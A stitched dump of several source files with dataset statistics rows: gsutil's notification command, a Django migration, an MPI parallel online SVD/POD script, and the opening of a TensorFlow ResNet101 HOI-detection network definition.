#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides the notification command to gsutil."""
from __future__ import absolute_import
import getopt
import uuid
from gslib import metrics
from gslib.cloud_api import AccessDeniedException
from gslib.command import Command
from gslib.command import NO_MAX
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.help_provider import CreateHelpText
from gslib.storage_url import StorageUrlFromString
_WATCHBUCKET_SYNOPSIS = """
gsutil notification watchbucket [-i id] [-t token] app_url bucket_url...
"""
_STOPCHANNEL_SYNOPSIS = """
gsutil notification stopchannel channel_id resource_id
"""
_SYNOPSIS = _WATCHBUCKET_SYNOPSIS + _STOPCHANNEL_SYNOPSIS.lstrip('\n')
_WATCHBUCKET_DESCRIPTION = """
<B>WATCHBUCKET</B>
The watchbucket sub-command can be used to watch a bucket for object changes.
A service account must be used when running this command.
The app_url parameter must be an HTTPS URL to an application that will be
notified of changes to any object in the bucket. The URL endpoint must be
a verified domain on your project. See
`Notification Authorization <https://cloud.google.com/storage/docs/object-change-notification#_Authorization>`_
for details.
The optional id parameter can be used to assign a unique identifier to the
created notification channel. If not provided, a random UUID string will be
generated.
The optional token parameter can be used to validate notification events.
To do this, set this custom token and store it to later verify that
notification events contain the client token you expect.
"""
_STOPCHANNEL_DESCRIPTION = """
<B>STOPCHANNEL</B>
The stopchannel sub-command can be used to stop sending change events to a
notification channel.
The channel_id and resource_id parameters should match the values from the
response of a bucket watch request.
"""
_DESCRIPTION = """
The notification command can be used to configure notifications.
For more information on the Object Change Notification feature, please see:
https://cloud.google.com/storage/docs/object-change-notification
The notification command has two sub-commands:
""" + _WATCHBUCKET_DESCRIPTION + _STOPCHANNEL_DESCRIPTION + """
<B>EXAMPLES</B>
Watch the bucket example-bucket for changes and send notifications to an
application server running at example.com:
gsutil notification watchbucket https://example.com/notify \\
gs://example-bucket
Assign identifier my-channel-id to the created notification channel:
gsutil notification watchbucket -i my-channel-id \\
https://example.com/notify gs://example-bucket
Set a custom client token that will be included with each notification event:
gsutil notification watchbucket -t my-client-token \\
https://example.com/notify gs://example-bucket
Stop the notification event channel with channel identifier channel1 and
resource identifier SoGqan08XDIFWr1Fv_nGpRJBHh8:
gsutil notification stopchannel channel1 SoGqan08XDIFWr1Fv_nGpRJBHh8
<B>NOTIFICATIONS AND PARALLEL COMPOSITE UPLOADS</B>
By default, gsutil enables parallel composite uploads for large files (see
"gsutil help cp"), which means that an upload of a large object can result
in multiple temporary component objects being uploaded before the actual
intended object is created. Any subscriber to notifications for this bucket
will then see a notification for each of these components being created and
deleted. If this is a concern for you, note that parallel composite uploads
can be disabled by setting "parallel_composite_upload_threshold = 0" in your
boto config file.
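  For example, adding the following to the [GSUtil] section of your boto
  config file disables parallel composite uploads:
    parallel_composite_upload_threshold = 0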
"""
NOTIFICATION_AUTHORIZATION_FAILED_MESSAGE = """
Watch bucket attempt failed:
{watch_error}
You attempted to watch a bucket with an application URL of:
{watch_url}
which is not authorized for your project. Please ensure that you are using
Service Account authentication and that the Service Account's project is
authorized for the application URL. Notification endpoint URLs must also be
whitelisted in your Cloud Console project. To do that, the domain must also be
verified using Google Webmaster Tools. For instructions, please see:
https://cloud.google.com/storage/docs/object-change-notification#_Authorization
"""
_DETAILED_HELP_TEXT = CreateHelpText(_SYNOPSIS, _DESCRIPTION)
_watchbucket_help_text = (
CreateHelpText(_WATCHBUCKET_SYNOPSIS, _WATCHBUCKET_DESCRIPTION))
_stopchannel_help_text = (
CreateHelpText(_STOPCHANNEL_SYNOPSIS, _STOPCHANNEL_DESCRIPTION))
class NotificationCommand(Command):
"""Implementation of gsutil notification command."""
# Command specification. See base class for documentation.
command_spec = Command.CreateCommandSpec(
'notification',
command_name_aliases=[
'notify', 'notifyconfig', 'notifications', 'notif'],
usage_synopsis=_SYNOPSIS,
min_args=3,
max_args=NO_MAX,
supported_sub_args='i:t:',
file_url_ok=False,
provider_url_ok=False,
urls_start_arg=1,
gs_api_support=[ApiSelector.JSON],
gs_default_api=ApiSelector.JSON,
argparse_arguments={
'watchbucket': [
CommandArgument.MakeFreeTextArgument(),
CommandArgument.MakeZeroOrMoreCloudBucketURLsArgument()
],
'stopchannel': []
}
)
# Help specification. See help_provider.py for documentation.
help_spec = Command.HelpSpec(
help_name='notification',
help_name_aliases=['watchbucket', 'stopchannel', 'notifyconfig'],
help_type='command_help',
help_one_line_summary='Configure object change notification',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={'watchbucket': _watchbucket_help_text,
'stopchannel': _stopchannel_help_text},
)
def _WatchBucket(self):
"""Creates a watch on a bucket given in self.args."""
self.CheckArguments()
identifier = None
client_token = None
if self.sub_opts:
for o, a in self.sub_opts:
if o == '-i':
identifier = a
if o == '-t':
client_token = a
identifier = identifier or str(uuid.uuid4())
watch_url = self.args[0]
bucket_arg = self.args[-1]
if not watch_url.lower().startswith('https://'):
raise CommandException('The application URL must be an https:// URL.')
bucket_url = StorageUrlFromString(bucket_arg)
if not (bucket_url.IsBucket() and bucket_url.scheme == 'gs'):
raise CommandException(
'The %s command can only be used with gs:// bucket URLs.' %
self.command_name)
if not bucket_url.IsBucket():
raise CommandException('URL must name a bucket for the %s command.' %
self.command_name)
self.logger.info('Watching bucket %s with application URL %s ...',
bucket_url, watch_url)
try:
channel = self.gsutil_api.WatchBucket(
bucket_url.bucket_name, watch_url, identifier, token=client_token,
provider=bucket_url.scheme)
except AccessDeniedException, e:
self.logger.warn(NOTIFICATION_AUTHORIZATION_FAILED_MESSAGE.format(
watch_error=str(e), watch_url=watch_url))
raise
channel_id = channel.id
resource_id = channel.resourceId
client_token = channel.token
self.logger.info('Successfully created watch notification channel.')
self.logger.info('Watch channel identifier: %s', channel_id)
self.logger.info('Canonicalized resource identifier: %s', resource_id)
self.logger.info('Client state token: %s', client_token)
return 0
def _StopChannel(self):
channel_id = self.args[0]
resource_id = self.args[1]
self.logger.info('Removing channel %s with resource identifier %s ...',
channel_id, resource_id)
self.gsutil_api.StopChannel(channel_id, resource_id, provider='gs')
    self.logger.info('Successfully removed channel.')
return 0
def _RunSubCommand(self, func):
try:
(self.sub_opts, self.args) = getopt.getopt(
self.args, self.command_spec.supported_sub_args)
# Commands with both suboptions and subcommands need to reparse for
# suboptions, so we log again.
metrics.LogCommandParams(sub_opts=self.sub_opts)
return func()
except getopt.GetoptError, e:
self.RaiseInvalidArgumentException()
def RunCommand(self):
"""Command entry point for the notification command."""
subcommand = self.args.pop(0)
if subcommand == 'watchbucket':
metrics.LogCommandParams(subcommands=[subcommand])
return self._RunSubCommand(self._WatchBucket)
elif subcommand == 'stopchannel':
metrics.LogCommandParams(subcommands=[subcommand])
return self._RunSubCommand(self._StopChannel)
else:
raise CommandException('Invalid subcommand "%s" for the %s command.' %
(subcommand, self.command_name))
| 36.638783 | 113 | 0.732669 | 1,219 | 9,636 | 5.654635 | 0.274815 | 0.013057 | 0.014217 | 0.007979 | 0.109386 | 0.072247 | 0.066154 | 0.050486 | 0.029885 | 0.029885 | 0 | 0.003843 | 0.189809 | 9,636 | 262 | 114 | 36.778626 | 0.879083 | 0.083333 | 0 | 0.085106 | 0 | 0.005319 | 0.485335 | 0.010591 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.06383 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62098ed13ce2805c2274aa650c177f0c748ff79f | 401 | py | Python | projects/migrations/0017_project_status_isvalidated.py | joatuapp/joatu-django | 5626d03ba89c55650ff5bff2e706ca0883ae3b9c | [
"MIT"
] | 10 | 2018-05-13T18:01:57.000Z | 2018-12-23T17:11:14.000Z | projects/migrations/0017_project_status_isvalidated.py | moileretour/joatu | 9d18cb58b4280235688e269be6fd2d34b77ccead | [
"MIT"
] | 88 | 2018-05-04T15:33:46.000Z | 2022-03-08T21:09:21.000Z | projects/migrations/0017_project_status_isvalidated.py | joatuapp/joatu-django | 5626d03ba89c55650ff5bff2e706ca0883ae3b9c | [
"MIT"
] | 7 | 2018-05-08T16:05:06.000Z | 2018-09-13T05:49:05.000Z | # Generated by Django 2.0.3 on 2018-03-26 01:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('projects', '0016_auto_20180325_2116'),
]
operations = [
migrations.AddField(
model_name='project_status',
name='isValidated',
field=models.BooleanField(default=False),
),
]
| 21.105263 | 53 | 0.613466 | 42 | 401 | 5.738095 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106897 | 0.276808 | 401 | 18 | 54 | 22.277778 | 0.724138 | 0.112219 | 0 | 0 | 1 | 0 | 0.158192 | 0.064972 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6218792313b28bf05b712a8e421f24aaaa0f9100 | 8,110 | py | Python | Parallel_POD/online_svd_parallel.py | Romit-Maulik/Tutorials-Demos-Practice | a58ddc819f24a16f7059e63d7f201fc2cd23e03a | [
"MIT"
] | 8 | 2020-09-02T14:46:07.000Z | 2021-11-29T15:27:05.000Z | Parallel_POD/online_svd_parallel.py | omersan/Practice | 77eecdc2a202e6b333123cfd92e7db6dc0eea021 | [
"MIT"
] | 18 | 2020-11-13T18:49:33.000Z | 2022-03-12T00:54:43.000Z | Parallel_POD/online_svd_parallel.py | omersan/Practice | 77eecdc2a202e6b333123cfd92e7db6dc0eea021 | [
"MIT"
] | 5 | 2019-09-25T23:57:00.000Z | 2021-04-18T08:15:34.000Z | import numpy as np
np.random.seed(10)
import matplotlib.pyplot as plt
from mpi4py import MPI
# For shared memory deployment: `export OPENBLAS_NUM_THREADS=1`
# Method of snapshots
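# (works on the small S x S covariance A^T A instead of the large N x N
#  one: its eigenvalues are the squared singular values, and the left
#  singular vectors follow as u_i = A v_i / s_i)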
def generate_right_vectors(A):
'''
A - Snapshot matrix - shape: NxS
returns V - truncated right singular vectors
'''
new_mat = np.matmul(np.transpose(A),A)
w, v = np.linalg.eig(new_mat)
svals = np.sqrt(np.abs(w))
rval = np.argmax(svals<0.0001) # eps0
return v[:,:rval], np.sqrt(np.abs(w[:rval])) # Covariance eigenvectors, singular values
# Randomized SVD to accelerate
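# (randomized range finder: sketch Y = (A A^T) A omega with a Gaussian test
#  matrix omega (one power iteration for accuracy), QR the sketch, then SVD
#  the small projected matrix B = Q^T A and lift back via unew = Q @ ustar)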
def low_rank_svd(A,K):
M = A.shape[0]
N = A.shape[1]
omega = np.random.normal(size=(N,2*K))
omega_pm = np.matmul(A,np.transpose(A))
Y = np.matmul(omega_pm,np.matmul(A,omega))
Qred, Rred = np.linalg.qr(Y)
B = np.matmul(np.transpose(Qred),A)
ustar, snew, _ = np.linalg.svd(B)
unew = np.matmul(Qred,ustar)
unew = unew[:,:K]
snew = snew[:K]
return unew, snew
# Check orthogonality
def check_ortho(modes,num_modes):
    passed = True
    for m1 in range(num_modes):
        for m2 in range(num_modes):
            s_ = np.sum(modes[:,m1]*modes[:,m2])
            expected = 1.0 if m1 == m2 else 0.0
            # the original printed success unconditionally, even after a
            # failed check; track a flag so the final verdict is honest
            if not np.isclose(s_,expected):
                print('Orthogonality check failed for modes (%d, %d)' % (m1, m2))
                passed = False
    if passed:
        print('Orthogonality check passed successfully')
class online_svd_calculator(object):
"""
docstring for online_svd_calculator:
K : Number of modes to truncate
ff : Forget factor
"""
def __init__(self, K, ff, low_rank=False):
super(online_svd_calculator, self).__init__()
self.K = K
self.ff = ff
# Initialize MPI
self.comm = MPI.COMM_WORLD
self.rank = self.comm.Get_rank()
self.nprocs = self.comm.Get_size()
self.iteration = 0
self.low_rank = low_rank
# Initialize
def initialize(self, A):
self.ulocal, self.svalue = self.parallel_svd(A)
def parallel_qr(self,A):
# Perform the local QR
q, r = np.linalg.qr(A)
rlocal_shape_0 = r.shape[0]
rlocal_shape_1 = r.shape[1]
# Gather data at rank 0:
r_global = self.comm.gather(r,root=0)
# perform SVD at rank 0:
if self.rank == 0:
temp = r_global[0]
for i in range(self.nprocs-1):
temp = np.concatenate((temp,r_global[i+1]),axis=0)
r_global = temp
qglobal, rfinal = np.linalg.qr(r_global)
qglobal = -qglobal # Trick for consistency
rfinal = -rfinal
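            # QR is only unique up to column signs; negating both Q and R
            # leaves their product unchanged while keeping the sign
            # convention consistent across ranks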
# For this rank
qlocal = np.matmul(q,qglobal[:rlocal_shape_0])
# send to other ranks
for rank in range(1,self.nprocs):
self.comm.send(qglobal[rank*rlocal_shape_0:(rank+1)*rlocal_shape_0], dest=rank, tag=rank+10)
# Step b of Levy-Lindenbaum - small operation
if self.low_rank:
# Low rank SVD
unew, snew = low_rank_svd(rfinal,self.K)
else:
unew, snew, _ = np.linalg.svd(rfinal)
else:
# Receive qglobal slices from other ranks
qglobal = self.comm.recv(source=0, tag=self.rank+10)
# For this rank
qlocal = np.matmul(q,qglobal)
# To receive new singular vectors
unew = None
snew = None
unew = self.comm.bcast(unew,root=0)
snew = self.comm.bcast(snew,root=0)
return qlocal, unew, snew
def parallel_svd(self,A):
vlocal, slocal = generate_right_vectors(A)
# Find Wr
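        # W = V * diag(s): stacking each rank's scaled right vectors and
        # taking one small SVD at rank 0 recovers the global singular values
        # s and the mixing vectors x used below (the APMOS idea)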
wlocal = np.matmul(vlocal,np.diag(slocal).T)
# Gather data at rank 0:
wglobal = self.comm.gather(wlocal,root=0)
# perform SVD at rank 0:
if self.rank == 0:
temp = wglobal[0]
for i in range(self.nprocs-1):
temp = np.concatenate((temp,wglobal[i+1]),axis=-1)
wglobal = temp
if self.low_rank:
x, s = low_rank_svd(wglobal,self.K)
else:
x, s, y = np.linalg.svd(wglobal)
else:
x = None
s = None
x = self.comm.bcast(x,root=0)
s = self.comm.bcast(s,root=0)
# # Find truncation threshold
# s_ratio = np.cumsum(s)/np.sum(s)
# rval = np.argmax(1.0-s_ratio<0.0001) # eps1
# perform APMOS at each local rank
phi_local = []
for mode in range(self.K):
phi_temp = 1.0/s[mode]*np.matmul(A,x[:,mode:mode+1])
phi_local.append(phi_temp)
temp = phi_local[0]
for i in range(self.K-1):
temp = np.concatenate((temp,phi_local[i+1]),axis=-1)
        return temp, s[:self.K]
def incorporate_data(self,A):
self.iteration+=1
ll = self.ff*np.matmul(self.ulocal,np.diag(self.svalue))
ll = np.concatenate((ll,A),axis=-1)
qlocal, utemp, self.svalue = self.parallel_qr(ll)
self.ulocal = np.matmul(qlocal,utemp)
def gather_modes(self):
# Gather modes at rank 0
# This is automatically in order
phi_global = self.comm.gather(self.ulocal,root=0)
if self.rank == 0:
phi = phi_global[0]
for i in range(self.nprocs-1):
phi = np.concatenate((phi,phi_global[i+1]),axis=0)
np.save('Online_Parallel_POD.npy',phi)
np.save('Online_Parallel_SingularValues.npy',self.svalue)
# Validate
serial = np.load('Serial_Modes_MOS.npy')
parallel_online = np.load('Online_Parallel_POD.npy')
serial_online = np.load('Online_Serial_POD.npy')
plt.figure()
plt.plot(serial[:,0],label='serial one-shot')
plt.plot(parallel_online[:,0],label='parallel_online')
plt.plot(serial_online[:,0],label='serial_online')
plt.title('U comparison - column 0')
plt.xlabel('Domain')
plt.ylabel('U magnitude')
plt.legend()
plt.figure()
plt.plot(serial[:,2],label='serial one-shot')
plt.plot(parallel_online[:,2],label='parallel_online')
plt.plot(serial_online[:,2],label='serial_online')
plt.title('U comparison - column 2')
plt.xlabel('Domain')
plt.ylabel('U magnitude')
plt.legend()
serial_svs = np.load('Serial_SingularValues.npy')
serial_online_svs = np.load('Online_Serial_SingularValues.npy')
parallel_online_svs = np.load('Online_Parallel_SingularValues.npy')
plt.figure()
plt.plot(serial_svs[:self.K],label='serial one-shot')
plt.plot(parallel_online_svs[:self.K],label='parallel_online')
plt.plot(serial_online_svs[:self.K],label='serial_online')
plt.title('Singular values')
plt.xlabel('Index')
plt.ylabel('Magnitude')
plt.legend()
plt.show()
# Check orthogonality - should all be successful
check_ortho(serial,self.K)
check_ortho(serial_online,self.K)
check_ortho(parallel_online,self.K)
if __name__ == '__main__':
from time import time
# Initialize timer
start_time = time()
test_class = online_svd_calculator(10,1.0,low_rank=True)
iteration = 0
data = np.load('points_rank_'+str(test_class.rank)+'_batch_'+str(iteration)+'.npy')
test_class.initialize(data)
for iteration in range(1,4):
data = np.load('points_rank_'+str(test_class.rank)+'_batch_'+str(iteration)+'.npy')
test_class.incorporate_data(data)
end_time = time()
print('Time required for parallel streaming SVD (each rank):', end_time-start_time)
test_class.gather_modes() | 30.954198 | 108 | 0.569667 | 1,086 | 8,110 | 4.11326 | 0.208103 | 0.014551 | 0.017461 | 0.006268 | 0.29259 | 0.231028 | 0.193418 | 0.167898 | 0.108126 | 0.081039 | 0 | 0.017638 | 0.307891 | 8,110 | 262 | 109 | 30.954198 | 0.778193 | 0.117386 | 0 | 0.189024 | 1 | 0 | 0.091487 | 0.027107 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054878 | false | 0.006098 | 0.02439 | 0 | 0.109756 | 0.02439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
621946fa869b479764d5f279c948e790f062b5f0 | 32,670 | py | Python | lib/networks/ResNet101_HICO.py | zhihou7/VCL | 1bc21ec64d3bae15b8bac524cfa4beeaf08f2c48 | [
"MIT"
] | 29 | 2020-07-28T03:11:21.000Z | 2022-03-09T04:37:47.000Z | lib/networks/ResNet101_HICO.py | zhihou7/VCL | 1bc21ec64d3bae15b8bac524cfa4beeaf08f2c48 | [
"MIT"
] | 8 | 2020-08-19T06:40:42.000Z | 2022-03-07T03:48:57.000Z | lib/networks/ResNet101_HICO.py | zhihou7/VCL | 1bc21ec64d3bae15b8bac524cfa4beeaf08f2c48 | [
"MIT"
] | 7 | 2020-07-20T09:05:17.000Z | 2021-11-26T13:04:25.000Z | # --------------------------------------------------------
# Tensorflow VCL
# Licensed under The MIT License [see LICENSE for details]
# Written by Zhi Hou, based on code from Transferable-Interactiveness-Network, Chen Gao, Zheqi he and Xinlei Chen
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.contrib.slim import arg_scope
from tensorflow.contrib.slim.python.slim.nets import resnet_utils
from tensorflow.contrib.slim.python.slim.nets import resnet_v1
from tensorflow.python.framework import ops
from ult.tools import get_convert_matrix
from ult.config import cfg
from ult.visualization import draw_bounding_boxes_HOI
import numpy as np
def resnet_arg_scope(is_training=True,
weight_decay=cfg.TRAIN.WEIGHT_DECAY,
batch_norm_decay=0.997,
batch_norm_epsilon=1e-5,
batch_norm_scale=True):
batch_norm_params = {
'is_training': False,
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon,
'scale': batch_norm_scale,
'trainable': False,
'updates_collections': ops.GraphKeys.UPDATE_OPS
}
with arg_scope(
[slim.conv2d, slim.fully_connected],
weights_regularizer = tf.contrib.layers.l2_regularizer(cfg.TRAIN.WEIGHT_DECAY),
weights_initializer = slim.variance_scaling_initializer(),
biases_regularizer = tf.contrib.layers.l2_regularizer(cfg.TRAIN.WEIGHT_DECAY),
biases_initializer = tf.constant_initializer(0.0),
trainable = is_training,
activation_fn = tf.nn.relu,
normalizer_fn = slim.batch_norm,
normalizer_params = batch_norm_params):
with arg_scope([slim.batch_norm], **batch_norm_params) as arg_sc:
return arg_sc
class ResNet101():
def __init__(self, model_name):
self.model_name = model_name
self.visualize = {}
self.test_visualize = {}
self.intermediate = {}
self.predictions = {}
self.score_summaries = {}
self.event_summaries = {}
self.train_summaries = []
self.losses = {}
self.image = tf.placeholder(tf.float32, shape=[1, None, None, 3], name = 'image')
self.spatial = tf.placeholder(tf.float32, shape=[None, 64, 64, 3], name = 'sp')
self.H_boxes = tf.placeholder(tf.float32, shape=[None, 5], name = 'H_boxes')
self.O_boxes = tf.placeholder(tf.float32, shape=[None, 5], name = 'O_boxes')
self.gt_class_HO = tf.placeholder(tf.float32, shape=[None, 600], name = 'gt_class_HO')
self.H_num = tf.placeholder(tf.int32) # positive nums
self.image_id = tf.placeholder(tf.int32)
self.num_classes = 600
self.compose_num_classes = 600
self.num_fc = 1024
self.verb_num_classes = 117
self.obj_num_classes = 80
self.scope = 'resnet_v1_101'
self.stride = [16, ]
self.lr = tf.placeholder(tf.float32)
if tf.__version__ == '1.1.0':
raise Exception('wrong tensorflow version 1.1.0')
else:
from tensorflow.contrib.slim.python.slim.nets.resnet_v1 import resnet_v1_block
self.blocks = [resnet_v1_block('block1', base_depth=64, num_units=3, stride=2),
resnet_v1_block('block2', base_depth=128, num_units=4, stride=2),
resnet_v1_block('block3', base_depth=256, num_units=23, stride=1),
resnet_v1_block('block4', base_depth=512, num_units=3, stride=1),
resnet_v1_block('block5', base_depth=512, num_units=3, stride=1)]
if self.model_name.__contains__('unique_weights') or self.model_name.__contains__('_pa3')\
or self.model_name.__contains__('_pa4'):
print("add block6 unique_weights2")
self.blocks.append(resnet_v1_block('block6', base_depth=512, num_units=3, stride=1))
"""We copy from TIN. calculated by log(1/(n_c/sum(n_c)) c is the category and n_c is
the number of positive samples"""
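        # Illustrative only: with num_inst holding per-class positive counts
        # (loaded further below), an equivalent recomputation would be
        # roughly np.log(num_inst.sum() / np.maximum(num_inst, 1.0)).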
self.HO_weight = np.array([
9.192927, 9.778443, 10.338059, 9.164914, 9.075144, 10.045923, 8.714437, 8.59822, 12.977117, 6.2745423,
11.227917, 6.765012, 9.436157, 9.56762, 11.0675745, 11.530198, 9.609821, 9.897503, 6.664475, 6.811699,
6.644726, 9.170454, 13.670264, 3.903943, 10.556748, 8.814335, 9.519224, 12.753973, 11.590822, 8.278912,
5.5245695, 9.7286825, 8.997436, 10.699849, 9.601237, 11.965516, 9.192927, 10.220277, 6.056692, 7.734048,
8.42324, 6.586457, 6.969533, 10.579222, 13.670264, 4.4531965, 9.326459, 9.288238, 8.071842, 10.431585,
12.417501, 11.530198, 11.227917, 4.0678477, 8.854023, 12.571651, 8.225684, 10.996116, 11.0675745,
10.100731,
7.0376034, 7.463688, 12.571651, 14.363411, 5.4902234, 11.0675745, 14.363411, 8.45805, 10.269067,
9.820116,
14.363411, 11.272368, 11.105314, 7.981595, 9.198626, 3.3284247, 14.363411, 12.977117, 9.300817,
10.032678,
12.571651, 10.114916, 10.471591, 13.264799, 14.363411, 8.01953, 10.412168, 9.644913, 9.981384,
7.2197933,
14.363411, 3.1178555, 11.031207, 8.934066, 7.546675, 6.386472, 12.060826, 8.862153, 9.799063, 12.753973,
12.753973, 10.412168, 10.8976755, 10.471591, 12.571651, 9.519224, 6.207762, 12.753973, 6.60636,
6.2896967,
4.5198326, 9.7887, 13.670264, 11.878505, 11.965516, 8.576513, 11.105314, 9.192927, 11.47304, 11.367679,
9.275815, 11.367679, 9.944571, 11.590822, 10.451388, 9.511381, 11.144535, 13.264799, 5.888291,
11.227917,
10.779892, 7.643191, 11.105314, 9.414651, 11.965516, 14.363411, 12.28397, 9.909063, 8.94731, 7.0330057,
8.129001, 7.2817025, 9.874775, 9.758241, 11.105314, 5.0690055, 7.4768796, 10.129305, 9.54313, 13.264799,
9.699972, 11.878505, 8.260853, 7.1437693, 6.9321113, 6.990665, 8.8104515, 11.655361, 13.264799,
4.515912,
9.897503, 11.418972, 8.113436, 8.795067, 10.236277, 12.753973, 14.363411, 9.352776, 12.417501,
0.6271591,
12.060826, 12.060826, 12.166186, 5.2946343, 11.318889, 9.8308115, 8.016022, 9.198626, 10.8976755,
13.670264,
11.105314, 14.363411, 9.653881, 9.503599, 12.753973, 5.80546, 9.653881, 9.592727, 12.977117, 13.670264,
7.995224, 8.639826, 12.28397, 6.586876, 10.929424, 13.264799, 8.94731, 6.1026597, 12.417501, 11.47304,
10.451388, 8.95624, 10.996116, 11.144535, 11.031207, 13.670264, 13.670264, 6.397866, 7.513285, 9.981384,
11.367679, 11.590822, 7.4348736, 4.415428, 12.166186, 8.573451, 12.977117, 9.609821, 8.601359, 9.055143,
11.965516, 11.105314, 13.264799, 5.8201604, 10.451388, 9.944571, 7.7855496, 14.363411, 8.5463,
13.670264,
7.9288645, 5.7561946, 9.075144, 9.0701065, 5.6871653, 11.318889, 10.252538, 9.758241, 9.407584,
13.670264,
8.570397, 9.326459, 7.488179, 11.798462, 9.897503, 6.7530537, 4.7828183, 9.519224, 7.6492405, 8.031909,
7.8180614, 4.451856, 10.045923, 10.83705, 13.264799, 13.670264, 4.5245686, 14.363411, 10.556748,
10.556748,
14.363411, 13.670264, 14.363411, 8.037262, 8.59197, 9.738439, 8.652985, 10.045923, 9.400566, 10.9622135,
11.965516, 10.032678, 5.9017305, 9.738439, 12.977117, 11.105314, 10.725825, 9.080208, 11.272368,
14.363411,
14.363411, 13.264799, 6.9279733, 9.153925, 8.075553, 9.126969, 14.363411, 8.903826, 9.488214, 5.4571533,
10.129305, 10.579222, 12.571651, 11.965516, 6.237189, 9.428937, 9.618479, 8.620408, 11.590822,
11.655361,
9.968962, 10.8080635, 10.431585, 14.363411, 3.796231, 12.060826, 10.302968, 9.551227, 8.75394,
10.579222,
9.944571, 14.363411, 6.272396, 10.625742, 9.690582, 13.670264, 11.798462, 13.670264, 11.724354,
9.993963,
8.230013, 9.100721, 10.374427, 7.865129, 6.514087, 14.363411, 11.031207, 11.655361, 12.166186, 7.419324,
9.421769, 9.653881, 10.996116, 12.571651, 13.670264, 5.912144, 9.7887, 8.585759, 8.272101, 11.530198,
8.886948,
5.9870906, 9.269661, 11.878505, 11.227917, 13.670264, 8.339964, 7.6763024, 10.471591, 10.451388,
13.670264,
11.185357, 10.032678, 9.313555, 12.571651, 3.993144, 9.379805, 9.609821, 14.363411, 9.709451, 8.965248,
10.451388, 7.0609145, 10.579222, 13.264799, 10.49221, 8.978916, 7.124196, 10.602211, 8.9743395, 7.77862,
8.073695, 9.644913, 9.339531, 8.272101, 4.794418, 9.016304, 8.012526, 10.674532, 14.363411, 7.995224,
12.753973, 5.5157638, 8.934066, 10.779892, 7.930471, 11.724354, 8.85808, 5.9025764, 14.363411,
12.753973,
12.417501, 8.59197, 10.513264, 10.338059, 14.363411, 7.7079706, 14.363411, 13.264799, 13.264799,
10.752493,
14.363411, 14.363411, 13.264799, 12.417501, 13.670264, 6.5661197, 12.977117, 11.798462, 9.968962,
12.753973,
11.47304, 11.227917, 7.6763024, 10.779892, 11.185357, 14.363411, 7.369478, 14.363411, 9.944571,
10.779892,
10.471591, 9.54313, 9.148476, 10.285873, 10.412168, 12.753973, 14.363411, 6.0308623, 13.670264,
10.725825,
12.977117, 11.272368, 7.663911, 9.137665, 10.236277, 13.264799, 6.715625, 10.9622135, 14.363411,
13.264799,
9.575919, 9.080208, 11.878505, 7.1863923, 9.366199, 8.854023, 9.874775, 8.2857685, 13.670264, 11.878505,
12.166186, 7.616999, 9.44343, 8.288065, 8.8104515, 8.347254, 7.4738197, 10.302968, 6.936267, 11.272368,
7.058223, 5.0138307, 12.753973, 10.173757, 9.863602, 11.318889, 9.54313, 10.996116, 12.753973,
7.8339925,
7.569945, 7.4427395, 5.560738, 12.753973, 10.725825, 10.252538, 9.307165, 8.491293, 7.9161053,
7.8849015,
7.782772, 6.3088884, 8.866243, 9.8308115, 14.363411, 10.8976755, 5.908519, 10.269067, 9.176025,
9.852551,
9.488214, 8.90809, 8.537411, 9.653881, 8.662968, 11.965516, 10.143904, 14.363411, 14.363411, 9.407584,
5.281472, 11.272368, 12.060826, 14.363411, 7.4135547, 8.920994, 9.618479, 8.891141, 14.363411,
12.060826,
11.965516, 10.9622135, 10.9622135, 14.363411, 5.658909, 8.934066, 12.571651, 8.614018, 11.655361,
13.264799,
10.996116, 13.670264, 8.965248, 9.326459, 11.144535, 14.363411, 6.0517673, 10.513264, 8.7430105,
10.338059,
13.264799, 6.878481, 9.065094, 8.87035, 14.363411, 9.92076, 6.5872955, 10.32036, 14.363411, 9.944571,
11.798462, 10.9622135, 11.031207, 7.652888, 4.334878, 13.670264, 13.670264, 14.363411, 10.725825,
12.417501,
14.363411, 13.264799, 11.655361, 10.338059, 13.264799, 12.753973, 8.206432, 8.916674, 8.59509,
14.363411,
7.376845, 11.798462, 11.530198, 11.318889, 11.185357, 5.0664344, 11.185357, 9.372978, 10.471591,
9.6629305,
11.367679, 8.73579, 9.080208, 11.724354, 5.04781, 7.3777695, 7.065643, 12.571651, 11.724354, 12.166186,
12.166186, 7.215852, 4.374113, 11.655361, 11.530198, 14.363411, 6.4993753, 11.031207, 8.344818,
10.513264,
10.032678, 14.363411, 14.363411, 4.5873594, 12.28397, 13.670264, 12.977117, 10.032678, 9.609821
], dtype='float32').reshape(1, 600)
num_inst_path = cfg.ROOT_DIR + '/Data/num_inst.npy'
num_inst = np.load(num_inst_path)
self.num_inst = num_inst
